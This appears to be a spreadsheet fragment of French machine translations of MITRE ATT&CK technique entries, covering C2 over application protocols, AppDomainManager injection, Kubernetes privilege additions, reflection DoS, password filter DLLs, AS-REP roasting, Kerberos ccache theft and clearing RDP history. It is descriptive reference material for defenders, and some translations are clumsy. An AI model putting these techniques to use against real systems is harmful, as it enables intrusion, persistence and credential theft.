    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application OSI pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les adversaires peuvent utiliser de nombreux protocoles différents, notamment ceux utilisés pour la navigation Web, le transfert de fichiers, le courrier électronique, le DNS ou la publication/l’abonnement. Pour les connexions qui se produisent en interne au sein d’une enclave (par exemple, celles entre un nœud proxy ou pivot et d’autres nœuds), les protocoles couramment utilisés sont SMB, SSH ou RDP. (Citation : Mandiant APT29 Eye Spy Email 22 novembre)
https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant la façon dont le .NET « AppDomainManager » charge les assemblys. Le framework .NET utilise la classe « AppDomainManager » pour créer et gérer un ou plusieurs environnements d’exécution isolés (appelés domaines d’application) à l’intérieur d’un processus afin d’héberger l’exécution d’applications .NET. Les assemblys (binaires .exe ou .dll compilés pour s’exécuter en tant que code .NET) peuvent être chargés dans un domaine d’application en tant que code exécutable. (Citation : Domaines d’application Microsoft) 
Connue sous le nom d'« injection AppDomainManager », les adversaires peuvent exécuter du code arbitraire en détournant la façon dont les applications .NET chargent les assemblys. Par exemple, les logiciels malveillants peuvent créer un domaine d’application personnalisé à l’intérieur d’un processus cible pour charger et exécuter un assembly arbitraire. Alternativement, les fichiers de configuration (« .config ») ou les variables d’environnement de processus qui définissent les paramètres d’exécution .NET peuvent être falsifiés pour indiquer à des applications .NET autrement inoffensives de charger un assembly malveillant (identifié par son nom) dans le processus cible. (Citation : PenTestLabs AppDomainManagerInject)(Citation : PwC Yellow Liderc)(Citation : Injection de Rapid7 AppDomain Manager)
https://attack.mitre.org/techniques/T1574/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées à partir de plusieurs systèmes dans un emplacement central ou un répertoire sur un seul système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Dans les environnements cloud, les adversaires peuvent regrouper les données au sein d’une instance ou d’une machine virtuelle particulière avant de les exfiltrer. Un adversaire peut [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et regrouper les données dans cette instance. (Citation : Mandiant M-Trends 2020)
En stockant les données sur un système avant l’exfiltration, les adversaires peuvent minimiser le nombre de connexions établies à leur serveur C2 et mieux échapper à la détection.
https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des rôles ou des autorisations supplémentaires à un compte d’utilisateur ou de service contrôlé par l’adversaire afin de maintenir un accès persistant à un système d’orchestration de conteneurs. Par exemple, un adversaire disposant d’autorisations suffisantes peut créer un RoleBinding ou un ClusterRoleBinding pour lier un Role ou un ClusterRole à un compte Kubernetes. (Référence : Kubernetes RBAC)(Citation : Attaque Aquasec Kubernetes 2023) Lorsque le contrôle d’accès basé sur les attributs (ABAC) est utilisé, un adversaire disposant d’autorisations suffisantes peut modifier une stratégie ABAC Kubernetes pour accorder au compte cible des autorisations supplémentaires. (Citation : Kuberentes ABAC)
Cette modification de compte peut immédiatement suivre [Créer un compte](https://attack.mitre.org/techniques/T1136) ou toute autre activité malveillante du compte. Les adversaires peuvent également modifier les [Comptes valides](https://attack.mitre.org/techniques/T1078) existants qu’ils ont compromis.  
Notez que lorsque des systèmes d’orchestration de conteneurs sont déployés dans des environnements cloud, comme avec Google Kubernetes Engine, Amazon Elastic Kubernetes Service et Azure Kubernetes Service, les attributions de contrôle d’accès en fonction du rôle (RBAC) basées sur le cloud ou les politiques ABAC peuvent souvent être utilisées à la place ou en plus des attributions d’autorisations locales. (Citation : Google Cloud Kubernetes IAM)(Référence : Rôles AWS EKS IAM pour les comptes de service)(Citation : Comptes de service Microsoft Azure Kubernetes Service) Dans ce cas, cette technique peut être utilisée conjointement avec [Rôles cloud supplémentaires](https://attack.mitre.org/techniques/T1098/003).
https://attack.mitre.org/techniques/T1098/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de planification des tâches pour faciliter l’exécution initiale ou récurrente de code malveillant. Des utilitaires existent dans tous les principaux systèmes d’exploitation pour planifier l’exécution de programmes ou de scripts à une date et une heure spécifiées. Une tâche peut également être planifiée sur un système distant, à condition que l’authentification appropriée soit respectée (par exemple, RPC et partage de fichiers et d’imprimantes dans les environnements Windows). La planification d’une tâche sur un système distant peut généralement nécessiter d’être membre d’un administrateur ou d’un groupe privilégié sur le système distant. (Citation : Sécurité du planificateur de tâches TechNet)
Les adversaires peuvent utiliser la planification des tâches pour exécuter des programmes au démarrage du système ou de manière planifiée pour la persistance. Ces mécanismes peuvent également être utilisés de manière abusive pour exécuter un processus dans le contexte d’un compte spécifié (par exemple, un compte avec des autorisations/privilèges élevés). À l’instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont également abusé de la planification des tâches pour masquer potentiellement une exécution unique dans le cadre d’un processus système approuvé. (Citation : ProofPoint Serpent)
https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de charges utiles malveillantes msiexec.exe à proxy Msiexec.exe est l’utilitaire de ligne de commande pour Windows Installer et est donc généralement associé à l’exécution de packages d’installation (.msi). (Citation : Microsoft msiexec) Le binaire Msiexec.exe peut également être signé numériquement par Microsoft.
Les adversaires peuvent abuser de msiexec.exe pour lancer des fichiers MSI accessibles localement ou par le réseau. Msiexec.exe pouvez également exécuter des DLL.(Citation : LOLBAS Msiexec)(Citation : TrendMicro Msiexec Feb 2018) Comme il peut être signé et natif sur les systèmes Windows, msiexec.exe peut être utilisé pour contourner les solutions de contrôle d’applications qui ne tiennent pas compte de son abus potentiel. Msiexec.exe’exécution peut également être élevée au rang de privilèges SYSTEM si la stratégie &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; est activée. (Citation : Microsoft AlwaysInstallElevated 2018)
https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les dépendances d’approbation du réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les approbations de réseau peuvent inclure divers détails, y compris des organisations/domaines secondaires ou tiers (par exemple, des fournisseurs de services gérés, des sous-traitants, etc.) qui ont un accès réseau connecté (et potentiellement élevé).
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les fiducies de réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : Pentesting AD Forests)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[Fiable Relation](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de provoquer un déni de service (DoS) en reflétant un volume élevé de trafic réseau à une cible. Ce type de DoS réseau tire parti d’un serveur intermédiaire tiers qui héberge et répondra à une adresse IP source usurpée donnée. Ce serveur tiers est communément appelé réflecteur. Un adversaire réalise une attaque par réflexion en envoyant des paquets à des réflecteurs avec l’adresse usurpée de la victime. À l’instar des Direct Network Floods, plusieurs systèmes peuvent être utilisés pour mener l’attaque, ou un botnet peut être utilisé. De même, un ou plusieurs réflecteurs peuvent être utilisés pour concentrer le trafic sur la cible. (Citation : Cloudflare ReflectionDoS mai 2017) Cette attaque par déni de service réseau peut également réduire la disponibilité et la fonctionnalité du ou des systèmes et du réseau ciblés.
Les attaques par réflexion tirent souvent parti des protocoles avec des réponses plus importantes que les requêtes afin d’amplifier leur trafic, ce que l’on appelle communément une attaque par amplification par réflexion. Les adversaires peuvent être en mesure de générer une augmentation du volume du trafic d’attaque supérieure de plusieurs ordres de grandeur aux requêtes envoyées aux amplificateurs. L’ampleur de cette augmentation dépendra de nombreuses variables, telles que le protocole en question, la technique utilisée et les serveurs d’amplification qui produisent réellement l’amplification du volume d’attaque. Deux protocoles importants qui ont permis l’amplification de réflexion sont DNS(Citation : Cloudflare DNSamplficationDoS) et NTP(Citation : Cloudflare NTPamplifciationDoS), bien que l’utilisation de plusieurs autres dans la nature ait été documentée. (Citation : Arbor AnnualDoSreport janvier 2018)  En particulier, le protocole memcache s’est avéré être un protocole puissant, avec des tailles d’amplification allant jusqu’à 51 200 fois le paquet demandeur. (Citation : Cloudflare Memcrashed février 2018)
https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer des bibliothèques de liens dynamiques (DLL) malveillantes de filtre de mot de passe dans le processus d’authentification pour acquérir les informations d’identification de l’utilisateur au fur et à mesure de leur validation. 
Les filtres de mots de passe Windows sont des mécanismes d’application de politiques de mots de passe pour les comptes de domaine et locaux. Les filtres sont implémentés sous forme de DLL contenant une méthode pour valider les mots de passe potentiels par rapport aux politiques de mot de passe. Les DLL de filtre peuvent être positionnées sur des ordinateurs locaux pour les comptes locaux et/ou des contrôleurs de domaine pour les comptes de domaine. Avant d’enregistrer de nouveaux mots de passe dans le gestionnaire de comptes de sécurité (SAM), l’autorité de sécurité locale (LSA) demande la validation de chaque filtre enregistré. Les modifications potentielles ne peuvent pas prendre effet tant que chaque filtre enregistré n’a pas été validé. 
Les adversaires peuvent enregistrer des filtres de mots de passe malveillants pour collecter des informations d’identification sur des ordinateurs locaux et/ou des domaines entiers. Pour effectuer une validation correcte, les filtres doivent recevoir des informations d’identification en texte brut de la part du LSA. Un filtre de mot de passe malveillant recevrait ces informations d’identification en texte brut chaque fois qu’une demande de mot de passe est effectuée. (Citation : Filtres de mots de passe Carnal Ownage septembre 2013)
https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des composants des services Terminal Server pour permettre un accès permanent aux systèmes. Les services Terminal Server de Microsoft, renommés Services Bureau à distance dans certains systèmes d’exploitation Windows Server à partir de 2022, permettent les connexions de terminal à distance aux hôtes. Les services Terminal Server permettent aux serveurs de transmettre une interface utilisateur graphique complète et interactive aux clients via RDP. (Citation : Services de bureau à distance de Microsoft)
[Service Windows]Les (https://attack.mitre.org/techniques/T1543/003) qui sont exécutés en tant que processus « générique » (ex : &lt;code&gt;svchost.exe&lt;/code&gt;) chargent le fichier DLL du service, dont l’emplacement est stocké dans une entrée de registre nommée &lt;code&gt;ServiceDll&lt;/code&gt;. (Citation : Principes fondamentaux des services système Microsoft) Le fichier &lt;code&gt;termsrv.dll&lt;/code&gt;, généralement stocké dans ' %SystemRoot %\System32\', est la valeur &lt;code&gt;ServiceDll&lt;/code&gt; par défaut pour les services Terminal Server dans 'HKLM\System\CurrentControlSet\services\TermService\Parameters\'.
Les adversaires peuvent modifier et/ou remplacer la DLL des services Terminal Server pour permettre un accès persistant aux hôtes victimisés. (Citation : James TermServ DLL) Des modifications peuvent être apportées à cette DLL pour exécuter des charges utiles arbitraires (tout en préservant potentiellement &lt;code&gt;les fonctionnalités termsrv.dll&lt;/code&gt; normales) ainsi que pour activer simplement des fonctionnalités abusives des services Terminal Server. Par exemple, un adversaire peut activer des fonctionnalités telles que des sessions simultanées [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) en corrigeant le fichier &lt;code&gt;termsrv.dll&lt;/code&gt; ou en modifiant la valeur &lt;code&gt;ServiceDll&lt;/code&gt; pour qu’elle pointe vers une DLL qui offre une fonctionnalité RDP accrue. (Citation : Windows OS Hub RDP)(Citation : RDPWrap Github) Sur un système d’exploitation Windows non serveur, cette fonctionnalité accrue peut également permettre à un adversaire d’éviter les invites des services Terminal Server qui avertissent/déconnectent les utilisateurs d’un système lorsqu’une nouvelle session RDP est créée.
https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’AppleScript pour l’exécution. AppleScript est un langage de script macOS conçu pour contrôler les applications et certaines parties du système d’exploitation via des messages inter-applications appelés AppleEvents. (Citation : Apple AppleScript) Ces messages AppleEvent peuvent être envoyés indépendamment ou facilement scriptés avec AppleScript. Ces événements peuvent localiser les fenêtres ouvertes, envoyer des frappes au clavier et interagir avec presque toutes les applications ouvertes localement ou à distance.
Les scripts peuvent être exécutés à partir de la ligne de commande via &lt;code&gt;osascript /path/to/script&lt;/code&gt; ou &lt;code&gt;osascript -e « script here ».&lt;/code&gt; Outre la ligne de commande, les scripts peuvent être exécutés de nombreuses façons, notamment les règles de messagerie, les alarmes Calendar.app et les flux de travail Automator. Les AppleScripts peuvent également être exécutés en tant que scripts shell en texte brut en ajoutant &lt;code&gt;# !/usr/bin/osascript&lt;/code&gt; au début du fichier de script. (Citation : SentinelOne AppleScript)
Les AppleScripts n’ont pas besoin d’appeler &lt;code&gt;osascript&lt;/code&gt; pour s’exécuter. Cependant, ils peuvent être exécutés à partir de binaires mach-O à l’aide du &lt;code&gt;NSAppleScript&lt;/code&gt; ou &lt;code&gt;OSAScript&lt;/code&gt; de macOS [API native https://attack.mitre.org/techniques/T1106, qui exécutent tous deux du code indépendamment de l’utilitaire de ligne de commande &lt;code&gt;/usr/bin/osascript&lt;/code&gt;.
Les adversaires peuvent abuser d’AppleScript pour exécuter divers comportements, tels que l’interaction avec une connexion SSH ouverte, le déplacement vers des machines distantes et même la présentation aux utilisateurs de fausses boîtes de dialogue. Ces événements ne peuvent pas démarrer les applications à distance (ils peuvent les démarrer localement), mais ils peuvent interagir avec les applications si elles s’exécutent déjà à distance. Sur macOS 10.10 Yosemite et versions ultérieures, AppleScript a la capacité d’exécuter des [API natives](https://attack.mitre.org/techniques/T1106), qui nécessiteraient autrement une compilation et une exécution dans un format de fichier binaire mach-O. (Citation : SentinelOne macOS Red Team) Comme il s’agit d’un langage de script, il peut également être utilisé pour lancer des techniques plus courantes, telles qu’un shell inverse via [Python](https://attack.mitre.org/techniques/T1059/006). (Citation : Les macro-malwares ciblent les Mac)
https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des extensions de navigateur Internet pour établir un accès persistant aux systèmes des victimes. Les extensions de navigateur ou les plugins sont de petits programmes qui peuvent ajouter des fonctionnalités et personnaliser des aspects des navigateurs Internet. Ils peuvent être installés directement ou via la boutique d’applications d’un navigateur et ont généralement accès et autorisations à tout ce que le navigateur peut accéder. (citation : Extension de navigateur Wikipédia)(Citation : Définition des extensions Chrome)
Des extensions malveillantes peuvent être installées dans un navigateur par le biais de téléchargements malveillants sur une boutique d’applications se faisant passer pour des extensions légitimes, par le biais de l’ingénierie sociale ou par un adversaire qui a déjà compromis un système. La sécurité peut être limitée sur les magasins d’applications de navigateur, il n’est donc pas difficile pour les extensions malveillantes de déjouer les scanners automatisés. (Citation : numéros d’extension Chrome malveillants) Selon le navigateur, les adversaires peuvent également manipuler l’URL de mise à jour d’une extension pour installer des mises à jour à partir d’un serveur contrôlé par l’adversaire ou manipuler le fichier de configuration mobile pour installer silencieusement des extensions supplémentaires.
Avant macOS 11, les adversaires pouvaient installer silencieusement des extensions de navigateur via la ligne de commande à l’aide de l’outil de &lt;code&gt;profils&lt;/code&gt; pour installer des fichiers &lt;code&gt;.mobileconfig&lt;/code&gt; malveillants. Dans macOS 11+, l’utilisation de l’outil &lt;code&gt;Profils&lt;/code&gt; ne peut plus installer de profils de configuration, mais les fichiers &lt;code&gt;.mobileconfig&lt;/code&gt; peuvent être plantés et installés avec l’interaction de l’utilisateur. (Citation : extensions chrome xorrior macOS)
Une fois l’extension installée, elle peut accéder à des sites Web en arrière-plan, voler toutes les informations qu’un utilisateur saisit dans un navigateur (y compris les informations d’identification) et être utilisée comme installateur pour un RAT pour la persistance. (Citation : Chrome Extension Crypto Miner)(Citation : Extensions Chrome ICEBRG)(Citation : L’extension Google Chrome du banquier vole des crédits)(Citation : Extension Chrome Catch All)
Il y a également eu des cas de botnets utilisant une porte dérobée persistante via des extensions Chrome malveillantes pour [Command and Control](https://attack.mitre.org/tactics/TA0011). (Référence : Stantinko Botnet)(Citation : Chrome Extension C2 Malware) Les adversaires peuvent également utiliser des extensions de navigateur pour modifier les autorisations et les composants du navigateur, les paramètres de confidentialité et d’autres contrôles de sécurité pour [Defense Evasion](https://attack.mitre.org/tactics/TA0005). (Citation : Browers FriarFox)(Citation : navigateur Adrozek)
https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler les différents services réseau fournis par les systèmes pour effectuer un déni de service (DoS). Les adversaires ciblent souvent la disponibilité des services DNS et Web, mais d’autres ont également été ciblés. (Citation : Arbor AnnualDoSreport janvier 2018) Les logiciels de serveur Web peuvent être attaqués par divers moyens, dont certains s’appliquent généralement tandis que d’autres sont spécifiques au logiciel utilisé pour fournir le service.
Un exemple de ce type d’attaque est connu sous le nom de simple inondation HTTP, où un adversaire envoie un grand nombre de requêtes HTTP à un serveur Web pour le submerger et/ou à une application qui s’exécute par-dessus. Ce flood s’appuie sur le volume brut pour atteindre l’objectif, en épuisant toutes les ressources requises par le logiciel victime pour fournir le service. (Citation : Cloudflare HTTPflood)
Une autre variante, connue sous le nom d’attaque de renégociation SSL, tire parti d’une fonctionnalité de protocole dans SSL/TLS. La suite de protocoles SSL/TLS comprend des mécanismes permettant au client et au serveur de convenir d’un algorithme de cryptage à utiliser pour les connexions sécurisées ultérieures. Si la renégociation SSL est activée, une demande de renégociation de l’algorithme de chiffrement peut être faite. Dans une attaque de renégociation, l’adversaire établit une connexion SSL/TLS, puis procède à une série de demandes de renégociation. Étant donné que la renégociation cryptographique a un coût significatif en cycles de calcul, cela peut avoir un impact sur la disponibilité du service lorsqu’elle est effectuée en volume. (Citation : Arbor SSLDoS avril 2012)
https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les composants matériels des produits avant leur réception par un consommateur final dans le but de compromettre les données ou le système. En modifiant le matériel ou le micrologiciel dans la chaîne d’approvisionnement, les adversaires peuvent insérer une porte dérobée dans les réseaux grand public qui peut être difficile à détecter et donner à l’adversaire un degré élevé de contrôle sur le système. Les portes dérobées matérielles peuvent être insérées dans divers appareils, tels que des serveurs, des postes de travail, une infrastructure réseau ou des périphériques.
https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent interagir avec l’interface de programmation d’application (API) native du système d’exploitation pour exécuter des comportements. Les API natives fournissent un moyen contrôlé d’appeler des services de système d’exploitation de bas niveau au sein du noyau, tels que ceux impliquant du matériel/des périphériques, de la mémoire et des processus. (Citation : NT API Windows)(Citation : API du noyau Linux) Ces API natives sont exploitées par le système d’exploitation lors du démarrage du système (lorsque les autres composants du système ne sont pas encore initialisés) ainsi que lors de l’exécution de tâches et de demandes lors d’opérations de routine.
Les adversaires peuvent abuser de ces fonctions de l’API du système d’exploitation comme moyen d’exécuter des comportements. À l’instar de [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), l’API native et sa hiérarchie d’interfaces fournissent des mécanismes permettant d’interagir avec et d’utiliser divers composants d’un système victimisé.
Les fonctions API natives (telles que &lt;code&gt;NtCreateProcess&lt;/code&gt;) peuvent être appelées directement via des appels système / appels système, mais ces fonctionnalités sont également souvent exposées aux applications en mode utilisateur via des interfaces et des bibliothèques. (Citation : Appels système OutFlank)(Citation : Appels système CyberBit)(Citation : Appels système MDSec) Par exemple, des fonctions telles que l’API Windows &lt;code&gt;CreateProcess()&lt;/code&gt; ou GNU &lt;code&gt;fork()&lt;/code&gt; permettront aux programmes et aux scripts de démarrer d’autres processus. (Citation : Microsoft CreateProcess)(Citation : Fourche GNU) Cela peut permettre aux appelants d’API d’exécuter un binaire, d’exécuter une commande CLO, de charger des modules, etc., car des milliers de fonctions API similaires existent pour diverses opérations système. (Citation : Microsoft Win32)(Référence : LIBC)(Citation : GLIBC)
Des frameworks logiciels de niveau supérieur, tels que Microsoft .NET et macOS Cocoa, sont également disponibles pour interagir avec les API natives. Ces frameworks fournissent généralement des wrappers/abstractions de langage aux fonctionnalités de l’API et sont conçus pour la facilité d’utilisation/portabilité du code. (Citation : Microsoft NET)(Citation : Services de base d’Apple)(Citation : MACOS Cocoa)(Citation : Fondation macOS)
Les adversaires peuvent utiliser l’assembleur pour invoquer directement ou indirectement des appels système dans le but de contourner les capteurs défensifs et les signatures de détection telles que les crochets API en mode utilisateur. (Citation : Redops syscalls) Les adversaires peuvent également tenter de falsifier les capteurs et les outils défensifs associés à la surveillance des API, tels que le décrochage des fonctions surveillées via [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001).
https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de voler des tickets Kerberos stockés dans des fichiers de cache d’informations d’identification (ou ccache). Ces fichiers sont utilisés pour le stockage à court terme des informations d’identification de session active d’un utilisateur. Le fichier ccache est créé lors de l’authentification de l’utilisateur et permet d’accéder à plusieurs services sans que l’utilisateur ait à saisir à nouveau ses informations d’identification. 
Le fichier &lt;code&gt;de configuration /etc/krb5.conf&lt;/code&gt; et la variable &lt;code&gt;d’environnement KRB5CCNAME&lt;/code&gt; sont utilisés pour définir l’emplacement de stockage des entrées ccache. Sous Linux, les informations d’identification sont généralement stockées dans le répertoire '/tmp' avec un format de nommage 'krb5cc_ %UID %' ou 'krb5.ccache'. Sur macOS, les entrées ccache sont stockées par défaut en mémoire avec un schéma de nommage 'API :{uuid}'. En règle générale, les utilisateurs interagissent avec le stockage des tickets à l’aide &lt;code&gt;de kinit&lt;/code&gt;, qui obtient un ticket d’octroi de ticket (TGT) pour le principal. &lt;code&gt;klist, qui répertorie&lt;/code&gt; les tickets obtenus actuellement conservés dans le cache des identifiants ; et d’autres fichiers binaires intégrés. (Citation : Kerberos GNU/Linux)(Citation : Défense binaire Kerberos Linux)
Les adversaires peuvent collecter des tickets à partir de fichiers ccache stockés sur le disque et s’authentifier en tant qu’utilisateur actuel sans son mot de passe pour effectuer des attaques [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Les adversaires peuvent également utiliser ces tickets pour se faire passer pour des utilisateurs légitimes disposant de privilèges élevés afin d’effectuer [Élévation de privilèges](https://attack.mitre.org/tactics/TA0004). Des outils comme Kekeo peuvent également être utilisés par des adversaires pour convertir des fichiers ccache au format Windows pour plus de [Mouvement latéral](https://attack.mitre.org/tactics/TA0008). Sur macOS, les adversaires peuvent utiliser des outils open source ou le cadre Kerberos pour interagir avec les fichiers ccache et extraire des TGT ou des tickets de service via des API de niveau inférieur. (Citation : SpectorOps Bifrost Kerberos macOS 2019)(Citation : Billets Linux Kerberos)(Citation : Brining MimiKatz à Unix)(Citation : Kekeo)
https://attack.mitre.org/techniques/T1558/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer ou supprimer les preuves de connexions réseau malveillantes afin de nettoyer les traces de leurs opérations. Des paramètres de configuration ainsi que divers artefacts qui mettent en évidence l’historique des connexions peuvent être créés sur un système et/ou dans les journaux d’application à partir de comportements nécessitant des connexions réseau, tels que [Services à distance](https://attack.mitre.org/techniques/T1021) ou [Services à distance externes](https://attack.mitre.org/techniques/T1133). Les défenseurs peuvent utiliser ces artefacts pour surveiller ou analyser les connexions réseau créées par des adversaires.
L’historique des connexions réseau peut être stocké à différents endroits. Par exemple, l’historique de connexion RDP peut être stocké dans les valeurs du registre Windows sous (Citation : Suppression de Microsoft RDP) :
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Par défaut&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows peut également stocker des informations sur les connexions RDP récentes dans des fichiers tels que &lt;code&gt;C :\Users\\ %username %\Documents\Default.rdp&lt;/code&gt; et 'C :\Users\ %username %\AppData\Local\Microsoft\Terminal
Client serveur\Cache\'. (Citation : Moran RDPieces) De même, les hôtes macOS et Linux peuvent stocker des informations mettant en évidence l’historique des connexions dans les journaux système (tels que ceux stockés dans « /Library/Logs » et/ou « /var/log/ »). (Citation : Accès au coupable de la pomme)(Citation : FreeDesktop Journal)(Citation : Apple Unified Log Analysis Connexion à distance et partage d’écran)
Les connexions réseau malveillantes peuvent également nécessiter des modifications des applications tierces ou des paramètres de configuration réseau, telles que [Désactiver ou modifier le pare-feu système](https://attack.mitre.org/techniques/T1562/004) ou une altération pour activer [Proxy](https://attack.mitre.org/techniques/T1090). Les adversaires peuvent supprimer ou modifier ces données pour dissimuler des indicateurs et/ou entraver l’analyse défensive.
https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent révéler les informations d’identification des comptes qui ont désactivé la pré-authentification Kerberos par des messages Kerberos [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002). (Citation : Harmj0y Roasting AS-REPs janvier 2017) 
La pré-authentification offre une protection contre le [craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002). Lorsque cette option est activée, un utilisateur demandant l’accès à une ressource initie la communication avec le contrôleur de domaine (DC) en envoyant un message de demande de serveur d’authentification (AS-REQ) avec un horodatage chiffré avec le hachage de son mot de passe. Si et seulement si le contrôleur de domaine est en mesure de déchiffrer l’horodatage avec le hachage du mot de passe de l’utilisateur, il enverra alors un message de réponse du serveur d’authentification (AS-REP) contenant le ticket d’octroi de ticket (TGT) à l’utilisateur. Une partie du message AS-REP est signée avec le mot de passe de l’utilisateur. (Citation : Microsoft Kerberos Preauth 2014)
Pour chaque compte trouvé sans pré-authentification, un adversaire peut envoyer un message AS-REQ sans l’horodatage chiffré et recevoir un message AS-REP avec des données TGT qui peuvent être chiffrées à l’aide d’un algorithme non sécurisé tel que RC4. Les données chiffrées récupérées peuvent être vulnérables aux attaques hors ligne [Password Cracking](https://attack.mitre.org/techniques/T1110/002) de la même manière qu’à [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) et exposer des informations d’identification en texte clair. (Citation : Harmj0y Roasting AS-REPs janvier 2017)(Citation : Stealthbits Cracking AS-REP Roasting juin 2019) 
Un compte enregistré dans un domaine, avec ou sans privilèges spéciaux, peut être utilisé de manière abusive pour répertorier tous les comptes de domaine dont la pré-authentification est désactivée à l’aide d’outils Windows tels que [PowerShell](https://attack.mitre.org/techniques/T1059/001) avec un filtre LDAP. L’adversaire peut également envoyer un message AS-REQ pour chaque utilisateur. Si le contrôleur de domaine répond sans erreur, le compte ne nécessite pas de pré-authentification et le message AS-REP contiendra déjà les données chiffrées. (Citation : Harmj0y Roasting AS-REPs janvier 2017)(Citation : Stealthbits Cracking AS-REP Roasting juin 2019)
Les hachages piratés peuvent activer [Persistance](https://attack.mitre.org/tactics/TA0003), [Élévation de privilèges](https://attack.mitre.org/tactics/TA0004) et [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) via l’accès à [Comptes valides](https://attack.mitre.org/techniques/T1078). (Citation : SANS attaquant Kerberos novembre 2014)
https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les serveurs privés virtuels (VPS) tiers qui peuvent être utilisés lors du ciblage. Il existe une variété de fournisseurs de services cloud qui vendent des machines virtuelles/conteneurs en tant que service. Les adversaires peuvent compromettre les VPS achetés par des entités tierces. En compromettant un VPS pour l’utiliser comme infrastructure, les adversaires peuvent rendre difficile le lien physique entre les opérations. (Citation : NSA NCSC Turla OilRig)
La compromission d’un VPS pour une utilisation dans les étapes ultérieures du cycle de vie de l’adversaire, telles que la commande et le contrôle, peut permettre aux adversaires de bénéficier de l’omniprésence et de la confiance associées aux fournisseurs de services cloud de meilleure réputation, ainsi que de celles ajoutées par le tiers compromis.
https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des commandes et effectuer des tâches malveillantes à l’aide de scripts d’automatisation AutoIT et AutoHotKey. AutoIT et AutoHotkey (AHK) sont des langages de script qui permettent aux utilisateurs d’automatiser les tâches Windows. Ces scripts d’automatisation peuvent être utilisés pour effectuer une grande variété d’actions, telles que cliquer sur des boutons, saisir du texte et ouvrir et fermer des programmes. (Citation : AutoIT)(Citation : AutoHotKey)
Les adversaires peuvent utiliser des scripts AHK ('.ahk') et AutoIT ('.au3') pour exécuter du code malveillant sur le système d’une victime. Par exemple, des adversaires ont utilisé AHK pour exécuter des charges utiles et d’autres logiciels malveillants modulaires tels que des enregistreurs de frappe. Les adversaires ont également utilisé des fichiers AHK personnalisés contenant des logiciels malveillants intégrés comme charges utiles [Phishing](https://attack.mitre.org/techniques/T1566). (Citation : Splunk DarkGate)
Ces scripts peuvent également être compilés en charges utiles exécutables autonomes ('.exe'). (Citation : AutoIT)(Citation : AutoHotKey)
https://attack.mitre.org/techniques/T1059/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent réduire le niveau d’effort requis pour déchiffrer les données transmises sur le réseau en réduisant la force de chiffrement des communications chiffrées. (Citation : Cisco Synful Knock Evolution)
Les adversaires peuvent affaiblir le logiciel de chiffrement d’un périphérique réseau compromis en réduisant la taille de la clé utilisée par le logiciel pour convertir le texte en clair en texte chiffré (par exemple, de centaines ou de milliers d’octets à quelques octets seulement). Par conséquent, les adversaires réduisent considérablement la quantité d’efforts nécessaires pour déchiffrer les informations protégées sans la clé.
Les adversaires peuvent modifier la taille de la clé utilisée et d’autres paramètres de chiffrement à l’aide de commandes spécialisées dans une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduite dans le système via [Modifier l’image système](https://attack.mitre.org/techniques/T1601) pour modifier la configuration du périphérique. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
